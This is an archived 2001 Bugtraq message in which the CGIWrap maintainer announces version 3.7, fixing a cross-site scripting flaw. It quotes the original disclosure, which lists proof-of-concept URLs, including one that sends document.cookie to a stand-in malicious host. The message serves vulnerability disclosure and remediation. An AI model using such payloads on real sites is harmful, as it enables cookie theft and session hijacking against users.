[21771] in bugtraq

home help back first fref pref prev next nref lref last post

Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting

daemon@ATHENA.MIT.EDU (Nathan Neulinger)
Mon Jul 23 11:58:57 2001

Message-ID: <3B5B0FB7.29BC5DFF@umr.edu>
Date: Sun, 22 Jul 2001 12:39:03 -0500
From: Nathan Neulinger <nneul@umr.edu>
MIME-Version: 1.0
To: "TAKAGI, Hiromitsu" <takagi@etl.go.jp>,
        cgiwrap-users@lists.sourceforge.net, bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

The following cross-site scripting vulnerability was reported in
cgiwrap. This has just been corrected in version 3.7 which has just been
released.

http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

All error message output is now html encoded to prevent this problem.

-- Nathan

> "TAKAGI, Hiromitsu" wrote:
> >
> > Hi,
> >
> > I found a cross-site scripting vulnerability in CGIWrap.  Cookies
> > issued by the server on which CGIWrap is installed can be stolen.
> >
> > Please try to access the following URLs.
> >
> > Confirming the bug:
> >   http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
> >   http://www.unixtools.org/cgi-bin/cgiwrap/<S>
> >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>
> > JavaScript code will be executed:
> >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
> >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
> >   http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>
> > Stealing your Cookies issued by www.unixtools.org, if any:
> >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
> >
<snip>
> >
> > Regards,
> > --
> > Hiromitsu Takagi, Ph.D.
> > National Institute of Advanced Industrial Science and Technology,
> > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
> > http://www.etl.go.jp/~takagi/
> 
> _______________________________________________
> cgiwrap-users mailing list
> cgiwrap-users@lists.sourceforge.net
> http://lists.sourceforge.net/lists/listinfo/cgiwrap-users

-- 


------------------------------------------------------------
Nathan Neulinger                       EMail:  nneul@umr.edu
University of Missouri - Rolla         Phone: (573) 341-4841
CIS - Systems Programming                Fax: (573) 341-4216
home help back first fref pref prev next nref lref last post